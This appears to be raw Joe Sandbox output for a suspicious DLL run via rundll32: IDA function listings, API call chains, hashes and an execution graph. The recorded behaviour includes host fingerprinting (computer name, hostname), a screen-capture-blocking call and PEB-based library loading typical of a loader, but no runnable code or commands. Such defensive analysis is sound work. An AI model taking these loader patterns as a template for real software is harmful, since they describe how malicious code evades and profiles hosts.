                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                    • String ID: @
                    • API String ID: 1224256098-2726393805
                    • Opcode ID: 1e048b15689617cf6fef84c24a87f44e42e0c96230845d31f72f3834e6f83af9
                    • Instruction ID: 0b0bed8c8eebbd6d67c6367b68d9ce1b97082bde8158cfe09ad9c5ce7485af8a
                    • Opcode Fuzzy Hash: 1e048b15689617cf6fef84c24a87f44e42e0c96230845d31f72f3834e6f83af9
                    • Instruction Fuzzy Hash: 3F0152B1108312ABFB11DF04D945F7A77F8AB42705F814528FA84962D1D3B6C548CB42
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED0A76
                      • Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED15F6
                      • Part of subcall function 04ED15E1: __CxxThrowException@8.LIBCMT ref: 04ED160B
                      • Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED161C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: yxxx$yxxx
                    • API String ID: 1823113695-1021751087
                    • Opcode ID: 8e5fdac8fe6225b9f8ecff3b9ce797f32ae4c81fd604faebdfb104d94525f03c
                    • Instruction ID: 7a6bbcb3479ba48cfd59d177492074d1f39244a152693e14b28ecade4f2dbd80
                    • Opcode Fuzzy Hash: 8e5fdac8fe6225b9f8ecff3b9ce797f32ae4c81fd604faebdfb104d94525f03c
                    • Instruction Fuzzy Hash: 7EF06262B040364BC71CA53D9C944BE95C687D03987199639E993DFB95E820AC8292C0
                    APIs
                      • Part of subcall function 04EE1832: __getptd.LIBCMT ref: 04EE1838
                      • Part of subcall function 04EE1832: __getptd.LIBCMT ref: 04EE1848
                    • __getptd.LIBCMT ref: 04EE1D5C
                      • Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
                      • Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0
                    • __getptd.LIBCMT ref: 04EE1D6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
                    • Instruction ID: ff443744976d6f2e83c5f242927811d1a7e829f56bbfb5f6875a7eb3b00551c2
                    • Opcode Fuzzy Hash: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
                    • Instruction Fuzzy Hash: E201FB39A006058BDF34EF66D4446BDF7F5AF4031AF68A82DD481666A0CB30E9D1DB51
                    APIs
                      • Part of subcall function 04EC242A: __getptd.LIBCMT ref: 04EC2430
                      • Part of subcall function 04EC242A: __getptd.LIBCMT ref: 04EC2440
                    • __getptd.LIBCMT ref: 04EC2954
                      • Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
                      • Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848
                    • __getptd.LIBCMT ref: 04EC2962
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: csm
                    • API String ID: 803148776-1018135373
                    • Opcode ID: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
                    • Instruction ID: 3c143dd0e99969c0bdc0dfe32d1bee794a951055b738752ae7fa378499f0a7aa
                    • Opcode Fuzzy Hash: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
                    • Instruction Fuzzy Hash: A8016D35C00205CBDF34AF21E6807ADB7B6BF04219F5464ADE58956690CB31A983CB51
                    APIs
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC515F
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC5179
                      • Part of subcall function 04EC5140: GetComputerNameA.KERNEL32(00000000,?), ref: 04EC5199
                      • Part of subcall function 04EC5140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 04EC51AF
                      • Part of subcall function 04EC5140: _memset.LIBCMT ref: 04EC51C3
                      • Part of subcall function 04EC5140: wsprintfA.USER32 ref: 04EC51DB
                    • gethostname.WS2_32(?,00000032), ref: 04EC3FA3
                    • _strncpy.LIBCMT ref: 04EC3FAF
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
                    • String ID: Remark
                    • API String ID: 3464725772-3865500943
                    • Opcode ID: 449a13732344c0b3e2436ad96d08f262d5f45bddae4af3d2f4777d8cffe03877
                    • Instruction ID: c7044954eb88a8658f4fcfd3a4f972c6c0c9bc331f2db42c8c2326f496381b71
                    • Opcode Fuzzy Hash: 449a13732344c0b3e2436ad96d08f262d5f45bddae4af3d2f4777d8cffe03877
                    • Instruction Fuzzy Hash: 87E07D229441142F9A052B25BC0B8F77B2ECB4322DB0053ECFC4C47201EE033C1742E2
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 6CFF1245
                      • Part of subcall function 6CFF50F8: std::invalid_argument::invalid_argument.LIBCONCRT ref: 6CFF5104
                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CFF126E
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
                    • String ID: string too long
                    • API String ID: 1846318660-2556327735
                    • Opcode ID: 7fde19f9c502ba7c92373d0b060e582847bfcf2b1220230a6ebf080606fee048
                    • Instruction ID: 47bd6d6159c39829828231a4c3f67507b26e137033e45c9f7fa1b0aefe9d81a5
                    • Opcode Fuzzy Hash: 7fde19f9c502ba7c92373d0b060e582847bfcf2b1220230a6ebf080606fee048
                    • Instruction Fuzzy Hash: C2E0C2729182195BE620DF99DC05E8AB7ACDF15118320C636F658EB641E7B1E48087F5
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000FA0,-00000020,6D0638BD,6D0638BD,-00000020,00000FA0,00000000,00000000,00000000,00000000,?), ref: 6D0634AD
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,6D0638BD,-00000020,00000FA0,00000000,00000000,00000000,00000000,?), ref: 6D0634BD
                    Strings
                    • InitializeCriticalSectionEx, xrefs: 6D06348D
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: CountCriticalDisableInitializePrintScreen@@SectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2586602639-3084827643
                    • Opcode ID: 39f45392322d58e77e223fe468f1fc98ebf32b3629ba5e795d0cee64e6c80bd1
                    • Instruction ID: e6be1cd22b0a5a8e2d0197d6d7c64bcf3036c0a6afbe1dd6bec19e84f2d0613d
                    • Opcode Fuzzy Hash: 39f45392322d58e77e223fe468f1fc98ebf32b3629ba5e795d0cee64e6c80bd1
                    • Instruction Fuzzy Hash: 40E06D35045169B7EF121B91CC08FAE7F25EF09760B04C410FD2D2A152873299209AE1
                    APIs
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?), ref: 6D063291
                    • TlsAlloc.KERNEL32 ref: 6D06329B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocDisablePrintScreen@@
                    • String ID: FlsAlloc
                    • API String ID: 2334463026-671089009
                    • Opcode ID: ec7d0f7bc747401a8147f4a337b048bd4595063c6bc01d5410333d52ac84ce9a
                    • Instruction ID: 96331ecfbd7a3cf09aad10406ee99d2c99f748a4ef54fe7df4c0ed7481afa32b
                    • Opcode Fuzzy Hash: ec7d0f7bc747401a8147f4a337b048bd4595063c6bc01d5410333d52ac84ce9a
                    • Instruction Fuzzy Hash: CFE0CD3184417D77AB1127518C08BED3F14EF46770B040120FE1D661C39751450046E6
                    APIs
                    • __getptd_noexit.LIBCMT ref: 04EB93D5
                      • Part of subcall function 04EB47BF: GetLastError.KERNEL32(00000001,00000000,04EB5C91,04EB37E7,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB47C3
                      • Part of subcall function 04EB47BF: ___set_flsgetvalue.LIBCMT ref: 04EB47D1
                      • Part of subcall function 04EB47BF: __calloc_crt.LIBCMT ref: 04EB47E5
                      • Part of subcall function 04EB47BF: DecodePointer.KERNEL32(00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3,00000000,00000000,?,04EB48E3), ref: 04EB47FF
                      • Part of subcall function 04EB47BF: GetCurrentThreadId.KERNEL32 ref: 04EB4815
                      • Part of subcall function 04EB47BF: SetLastError.KERNEL32(00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3,00000000,00000000,?,04EB48E3), ref: 04EB482D
                    • __malloc_crt.LIBCMT ref: 04EB93F7
                      • Part of subcall function 04EB5C8C: __getptd_noexit.LIBCMT ref: 04EB5C8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLast__getptd_noexit$CurrentDecodePointerThread___set_flsgetvalue__calloc_crt__malloc_crt
                    • String ID: Time
                    • API String ID: 2454516118-3483776891
                    • Opcode ID: 918a117a8b7b2d92637de2843c84e9aa9ce79b05ebba547581708cc00deabc7d
                    • Instruction ID: a8a3315e3726131c7a27df8e43064ed8314be14483fbb0e1b52e1322013f3498
                    • Opcode Fuzzy Hash: 918a117a8b7b2d92637de2843c84e9aa9ce79b05ebba547581708cc00deabc7d
                    • Instruction Fuzzy Hash: C3E0C271504F328EE7326B38B4007DB22E08F81B28F022454E6D48B1C1DF70F841C6E0

                    Execution Graph

                    Execution Coverage:6%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:12
                    execution_graph 11374 3290009 11377 32b7000 11374->11377 11384 32b7216 11377->11384 11379 3290015 11380 32b700f 11380->11379 11382 32b70c7 11380->11382 11387 32b714d 11380->11387 11382->11379 11391 3293beb 11382->11391 11397 32b73ad GetPEB 11384->11397 11386 32b7222 11386->11380 11388 32b716a 11387->11388 11389 32b715d LoadLibraryA 11388->11389 11390 32b71a0 11388->11390 11389->11388 11389->11390 11390->11382 11392 3293bfb 11391->11392 11393 3293bf6 11391->11393 11399 3293af5 11392->11399 11411 329967f 11393->11411 11396 3293c09 11396->11379 11398 32b73c0 11397->11398 11398->11386 11400 3293b01 ___lock_fhandle 11399->11400 11401 3293b4e 11400->11401 11403 3293b9e ___lock_fhandle 11400->11403 11415 3293991 11400->11415 11401->11403 11467 32a7d50 11401->11467 11403->11396 11406 3293991 __CRT_INIT@12 149 API calls 11406->11403 11407 32a7d50 ___DllMainCRTStartup 357 API calls 11408 3293b75 11407->11408 11409 3293991 __CRT_INIT@12 149 API calls 11408->11409 11410 3293b7e 11409->11410 11410->11403 11410->11406 11412 32996b1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 11411->11412 11413 32996a4 11411->11413 11414 32996a8 11412->11414 11413->11412 11413->11414 11414->11392 11416 329399d ___lock_fhandle 11415->11416 11417 3293a1f 11416->11417 11418 32939a5 11416->11418 11420 3293a80 11417->11420 11421 3293a25 11417->11421 11471 3297645 HeapCreate 11418->11471 11422 3293ade 11420->11422 11423 3293a85 11420->11423 11427 3293a43 11421->11427 11433 32939ae ___lock_fhandle 11421->11433 11572 3297618 11421->11572 11422->11433 11607 3294621 11422->11607 11580 329433a TlsGetValue 11423->11580 11424 32939aa 11426 32939b5 11424->11426 11424->11433 11472 329468f GetModuleHandleW 11426->11472 11432 3293a57 11427->11432 11436 3296779 __ioterm 67 API calls 11427->11436 11576 3293a6a 11432->11576 11433->11401 11435 32939ba __RTC_Initialize 11439 32939be 11435->11439 11446 32939ca GetCommandLineA 11435->11446 11440 3293a4d 11436->11440 11497 3297663 HeapDestroy 11439->11497 11443 329436e __mtterm 70 API calls 11440->11443 11441 3293aa2 DecodePointer 11447 3293ab7 11441->11447 11445 3293a52 11443->11445 11444 32939c3 11444->11433 11575 3297663 HeapDestroy 11445->11575 11498 3299432 GetEnvironmentStringsW 11446->11498 11450 3293abb 11447->11450 11451 3293ad2 11447->11451 11588 32943ab 11450->11588 11601 329353a 11451->11601 11457 3293ac2 GetCurrentThreadId 11457->11433 11458 32939e8 11524 329436e 11458->11524 11462 3293a08 11462->11444 11567 3296779 11462->11567 11468 32a7d59 DisableThreadLibraryCalls 11467->11468 11469 3293b61 11467->11469 12396 32a46e0 11468->12396 11469->11407 11469->11410 11471->11424 11473 32946ac GetProcAddress GetProcAddress GetProcAddress GetProcAddress 11472->11473 11474 32946a3 11472->11474 11475 32946f6 TlsAlloc 11473->11475 11476 329436e __mtterm 70 API calls 11474->11476 11479 3294744 TlsSetValue 11475->11479 11481 3294805 11475->11481 11478 32946a8 11476->11478 11478->11435 11480 3294755 11479->11480 11479->11481 11618 32973d4 11480->11618 11481->11435 11486 329479d DecodePointer 11489 32947b2 11486->11489 11487 3294800 11488 329436e __mtterm 70 API calls 11487->11488 11488->11481 11489->11487 11490 3297260 __calloc_crt 66 API calls 11489->11490 11491 32947c8 11490->11491 11491->11487 11492 32947d0 DecodePointer 11491->11492 11493 32947e1 11492->11493 11493->11487 11494 32947e5 11493->11494 11495 32943ab __CRT_INIT@12 66 API calls 11494->11495 11496 32947ed GetCurrentThreadId 11495->11496 11496->11481 11497->11444 11499 32939da 11498->11499 11500 329944e WideCharToMultiByte 11498->11500 11511 3296534 GetStartupInfoW 11499->11511 11502 32994bb FreeEnvironmentStringsW 11500->11502 11503 3299483 11500->11503 11502->11499 11629 329721b 11503->11629 11506 3299491 WideCharToMultiByte 11507 32994af FreeEnvironmentStringsW 11506->11507 11508 32994a3 11506->11508 11507->11499 11509 329353a _free 66 API calls 11508->11509 11510 32994ab 11509->11510 11510->11507 11512 3297260 __calloc_crt 66 API calls 11511->11512 11516 3296552 11512->11516 11513 32939e4 11513->11458 11534 3299377 11513->11534 11514 32966c7 11515 32966fd GetStdHandle 11514->11515 11518 3296761 SetHandleCount 11514->11518 11519 329670f GetFileType 11514->11519 11522 3296735 InitializeCriticalSectionAndSpinCount 11514->11522 11515->11514 11516->11513 11516->11514 11517 3297260 __calloc_crt 66 API calls 11516->11517 11523 3296647 11516->11523 11517->11516 11518->11513 11519->11514 11520 329667e InitializeCriticalSectionAndSpinCount 11520->11513 11520->11523 11521 3296673 GetFileType 11521->11520 11521->11523 11522->11513 11522->11514 11523->11514 11523->11520 11523->11521 11525 3294378 DecodePointer 11524->11525 11526 3294387 11524->11526 11525->11526 11527 3294398 TlsFree 11526->11527 11528 32943a6 11526->11528 11527->11528 11529 329a164 DeleteCriticalSection 11528->11529 11530 329a17c 11528->11530 11531 329353a _free 66 API calls 11529->11531 11532 329a18e DeleteCriticalSection 11530->11532 11533 329a19c 11530->11533 11531->11528 11532->11530 11533->11439 11535 329938c 11534->11535 11536 3299391 GetModuleFileNameA 11534->11536 11776 329acaa 11535->11776 11538 32993b8 11536->11538 11780 32991dd 11538->11780 11541 329721b __malloc_crt 66 API calls 11542 32993fa 11541->11542 11543 32991dd _parse_cmdline 76 API calls 11542->11543 11544 32939f4 11542->11544 11543->11544 11544->11462 11545 3299101 11544->11545 11546 329910a 11545->11546 11549 329910f _strlen 11545->11549 11547 329acaa ___initmbctable 94 API calls 11546->11547 11547->11549 11548 32939fd 11548->11462 11561 329742b 11548->11561 11549->11548 11550 3297260 __calloc_crt 66 API calls 11549->11550 11551 3299144 _strlen 11550->11551 11551->11548 11552 3299193 11551->11552 11554 3297260 __calloc_crt 66 API calls 11551->11554 11555 32991b9 11551->11555 11558 32991d0 11551->11558 11957 3295bef 11551->11957 11553 329353a _free 66 API calls 11552->11553 11553->11548 11554->11551 11557 329353a _free 66 API calls 11555->11557 11557->11548 11559 329590f __invoke_watson 10 API calls 11558->11559 11560 32991dc 11559->11560 11563 3297439 __IsNonwritableInCurrentImage 11561->11563 11966 329adba 11563->11966 11564 3297457 __initterm_e 11566 3297478 __IsNonwritableInCurrentImage 11564->11566 11969 32933c7 11564->11969 11566->11462 11569 3296782 11567->11569 11568 32967c9 11568->11458 11569->11568 11570 329353a _free 66 API calls 11569->11570 11571 329679b DeleteCriticalSection 11569->11571 11570->11569 11571->11569 12034 32974c2 11572->12034 11574 3297623 11574->11427 11575->11432 11577 3293a7d 11576->11577 11578 3293a6f 11576->11578 11577->11433 11578->11577 11579 329436e __mtterm 70 API calls 11578->11579 11579->11577 11581 3293a8a 11580->11581 11582 329434f DecodePointer TlsSetValue 11580->11582 11583 3297260 11581->11583 11582->11581 11587 3297269 11583->11587 11585 3293a96 11585->11433 11585->11441 11586 3297287 Sleep 11586->11587 11587->11585 11587->11586 12064 329c581 11587->12064 12073 3295a00 11588->12073 11590 32943b7 GetModuleHandleW 11591 329a278 __lock 64 API calls 11590->11591 11592 32943f5 InterlockedIncrement 11591->11592 12074 329444d 11592->12074 11595 329a278 __lock 64 API calls 11596 3294416 11595->11596 12077 329a2ab InterlockedIncrement 11596->12077 11598 3294434 12089 3294456 11598->12089 11600 3294441 ___lock_fhandle 11600->11457 11602 329356e _free 11601->11602 11603 3293545 HeapFree 11601->11603 11602->11444 11603->11602 11604 329355a 11603->11604 11605 32959b3 __fptostr 64 API calls 11604->11605 11606 3293560 GetLastError 11605->11606 11606->11602 11608 329467a 11607->11608 11609 329462f 11607->11609 11612 329468d 11608->11612 11613 3294684 TlsSetValue 11608->11613 11610 329465c DecodePointer 11609->11610 11611 3294635 TlsGetValue 11609->11611 11616 3294672 11610->11616 11614 3294648 TlsGetValue 11611->11614 11615 3294658 11611->11615 11612->11433 11613->11612 11614->11615 11615->11610 12094 32944f2 11616->12094 11627 3294328 EncodePointer 11618->11627 11620 32973dc __init_pointers __initp_misc_winsig 11628 329c6f5 EncodePointer 11620->11628 11622 329475a EncodePointer EncodePointer EncodePointer EncodePointer 11623 329a0fe 11622->11623 11624 329a109 11623->11624 11625 329a113 InitializeCriticalSectionAndSpinCount 11624->11625 11626 3294799 11624->11626 11625->11624 11625->11626 11626->11486 11626->11487 11627->11620 11628->11622 11632 3297224 11629->11632 11631 329725a 11631->11502 11631->11506 11632->11631 11633 329723b Sleep 11632->11633 11634 329364e 11632->11634 11633->11632 11635 32936cb 11634->11635 11636 329365c 11634->11636 11637 3295cea _malloc DecodePointer 11635->11637 11639 3293667 11636->11639 11638 32936d1 11637->11638 11640 32959b3 __fptostr 65 API calls 11638->11640 11639->11636 11642 329368a HeapAlloc 11639->11642 11645 32936b7 11639->11645 11649 32936b5 11639->11649 11652 329784c 11639->11652 11661 329769d 11639->11661 11685 32973aa 11639->11685 11688 3295cea DecodePointer 11639->11688 11643 32936d7 11640->11643 11642->11639 11651 32936c3 11642->11651 11643->11632 11690 32959b3 11645->11690 11650 32959b3 __fptostr 65 API calls 11649->11650 11650->11651 11651->11643 11693 329cc55 11652->11693 11654 3297853 11655 329cc55 __FF_MSGBANNER 66 API calls 11654->11655 11657 3297860 11654->11657 11655->11657 11656 329769d __NMSG_WRITE 66 API calls 11658 3297878 11656->11658 11657->11656 11659 3297882 11657->11659 11660 329769d __NMSG_WRITE 66 API calls 11658->11660 11659->11639 11660->11659 11662 32976be __NMSG_WRITE 11661->11662 11664 329cc55 __FF_MSGBANNER 63 API calls 11662->11664 11684 32977da 11662->11684 11666 32976d8 11664->11666 11665 329784a 11665->11639 11667 32977e9 GetStdHandle 11666->11667 11668 329cc55 __FF_MSGBANNER 63 API calls 11666->11668 11671 32977f7 _strlen 11667->11671 11667->11684 11669 32976e9 11668->11669 11669->11667 11670 32976fb 11669->11670 11670->11684 11703 329cbf2 11670->11703 11673 329782d WriteFile 11671->11673 11671->11684 11673->11684 11675 3297754 _wcslen 11681 329ca95 63 API calls __NMSG_WRITE 11675->11681 11682 32977ca 11675->11682 11712 329590f 11675->11712 11715 329cb0a 11675->11715 11676 3297727 GetModuleFileNameW 11676->11675 11677 3297748 11676->11677 11678 329cbf2 __NMSG_WRITE 63 API calls 11677->11678 11678->11675 11681->11675 11724 329c929 11682->11724 11742 32920e4 11684->11742 11758 329737f GetModuleHandleW 11685->11758 11689 3295cff 11688->11689 11689->11639 11761 329445f GetLastError 11690->11761 11692 32959b8 11692->11649 11694 329cc61 11693->11694 11695 329cc6b 11694->11695 11696 32959b3 __fptostr 66 API calls 11694->11696 11695->11654 11697 329cc84 11696->11697 11700 3295961 11697->11700 11701 3295934 __fptostr 11 API calls 11700->11701 11702 329596d 11701->11702 11702->11654 11704 329cc00 11703->11704 11705 329cc07 11703->11705 11704->11705 11709 329cc28 11704->11709 11706 32959b3 __fptostr 66 API calls 11705->11706 11711 329cc0c 11706->11711 11707 3295961 __fptostr 11 API calls 11708 329771c 11707->11708 11708->11675 11708->11676 11709->11708 11710 32959b3 __fptostr 66 API calls 11709->11710 11710->11711 11711->11707 11750 32957e6 11712->11750 11720 329cb1c 11715->11720 11716 329cb20 11717 329cb25 11716->11717 11718 32959b3 __fptostr 66 API calls 11716->11718 11717->11675 11719 329cb3c 11718->11719 11721 3295961 __fptostr 11 API calls 11719->11721 11720->11716 11720->11717 11722 329cb63 11720->11722 11721->11717 11722->11717 11723 32959b3 __fptostr 66 API calls 11722->11723 11723->11719 11756 3294328 EncodePointer 11724->11756 11726 329c94f 11727 329c9dc 11726->11727 11728 329c95f LoadLibraryW 11726->11728 11730 329ca09 11727->11730 11734 329c9f6 DecodePointer DecodePointer 11727->11734 11729 329c974 GetProcAddress 11728->11729 11738 329ca74 11728->11738 11733 329c98a 7 API calls 11729->11733 11729->11738 11731 329ca68 DecodePointer 11730->11731 11732 329ca3f DecodePointer 11730->11732 11741 329ca2c 11730->11741 11731->11738 11732->11731 11739 329ca46 11732->11739 11733->11727 11736 329c9cc GetProcAddress EncodePointer 11733->11736 11734->11730 11735 32920e4 __fltout2 5 API calls 11737 329ca93 11735->11737 11736->11727 11737->11684 11738->11735 11739->11731 11740 329ca59 DecodePointer 11739->11740 11740->11731 11740->11741 11741->11731 11743 32920ec 11742->11743 11744 32920ee IsDebuggerPresent 11742->11744 11743->11665 11757 329971a 11744->11757 11747 3293d27 SetUnhandledExceptionFilter UnhandledExceptionFilter 11748 3293d4c GetCurrentProcess TerminateProcess 11747->11748 11749 3293d44 __call_reportfault 11747->11749 11748->11665 11749->11748 11751 3295805 _memset __call_reportfault 11750->11751 11752 3295823 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11751->11752 11753 32958f1 __call_reportfault 11752->11753 11754 32920e4 __fltout2 5 API calls 11753->11754 11755 329590d GetCurrentProcess TerminateProcess 11754->11755 11755->11675 11756->11726 11757->11747 11759 32973a3 ExitProcess 11758->11759 11760 3297393 GetProcAddress 11758->11760 11760->11759 11762 329433a ___set_flsgetvalue 3 API calls 11761->11762 11763 3294476 11762->11763 11764 32944cc SetLastError 11763->11764 11765 329447e 11763->11765 11764->11692 11766 3297260 __calloc_crt 62 API calls 11765->11766 11767 329448a 11766->11767 11767->11764 11768 3294492 DecodePointer 11767->11768 11769 32944a7 11768->11769 11770 32944ab 11769->11770 11771 32944c3 11769->11771 11772 32943ab __CRT_INIT@12 62 API calls 11770->11772 11773 329353a _free 62 API calls 11771->11773 11774 32944b3 GetCurrentThreadId 11772->11774 11775 32944c9 11773->11775 11774->11764 11775->11764 11777 329acb3 11776->11777 11778 329acba 11776->11778 11786 329ab10 11777->11786 11778->11536 11782 32991fc 11780->11782 11784 3299269 11782->11784 11951 329d28e 11782->11951 11783 3299367 11783->11541 11783->11544 11784->11783 11785 329d28e 76 API calls _parse_cmdline 11784->11785 11785->11784 11787 329ab1c ___lock_fhandle 11786->11787 11817 32944d8 11787->11817 11791 329ab2f 11838 329a8ab 11791->11838 11794 329721b __malloc_crt 66 API calls 11795 329ab50 11794->11795 11796 329ac6f ___lock_fhandle 11795->11796 11845 329a927 11795->11845 11796->11778 11799 329ac7c 11799->11796 11802 329ac8f 11799->11802 11805 329353a _free 66 API calls 11799->11805 11800 329ab80 InterlockedDecrement 11801 329aba1 InterlockedIncrement 11800->11801 11803 329ab90 11800->11803 11801->11796 